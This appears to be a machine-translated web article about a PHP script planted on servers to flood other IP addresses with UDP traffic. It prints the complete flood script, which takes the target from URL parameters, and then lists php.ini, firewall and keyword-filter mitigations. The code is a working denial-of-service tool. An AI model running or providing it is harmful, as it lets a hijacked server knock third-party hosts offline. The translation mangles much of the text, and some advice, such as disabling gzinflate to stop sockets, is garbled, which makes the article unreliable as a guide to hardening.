Call Sockets with PHP code, use the server's network to attack other IP directly, common code is as follows:
Copy Code code as follows:
$packets = 0;
$ip = $_get[\ ' ip\ '];
$rand = $_get[\ ' port\ '];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[\ ' time\ '];
$time = time ();
Print \ Flooded: $ip on port $rand
\";
$max _time = $time + $exec _time;
For ($i =0 $i <65535; $i + +) {
$out. = \ "X\";
}
while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Fsockopen (\ "udp://$ip \", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo \ "Packet complete at \". Time (\ ' h:i:s\ '). \ "with $packets (\". Round (($packets *65)/1024, 2). \ mB Packets G \ ". Round ($packets/$exec _time, 2). \ "PACKETS/S \\n\";
?>
Performance characteristics:
As soon as you turn on IIS, the bandwidth of the server runs out-----that is, the server continues to contract to others, this situation and by DDoS attack is different, DDoS is constantly receiving a large number of packets.
Solution:
Prohibit the above code:
Set in C:\windows\php.ini:
Disable_functions =gzinflate;
Set its value to off in C:\windows\php.ini
Allow_url_fopen = Off
And:
; Extension=php_sockets.dll
The front of the number must have, meaning is to limit the use of Sockets.dll
To keep in front of;
then restart IIS
If the above method is still not valid, you can disable the PHP extension test in IIS, allowed extensions.
In addition, for unencrypted PHP attack code, you can also use the following methods to deal with:
1. In IP policy, or firewall, prohibit all UDP to send out
2. With first-class information monitoring, in SQL interception and Web site interception, intercept port= this keyword
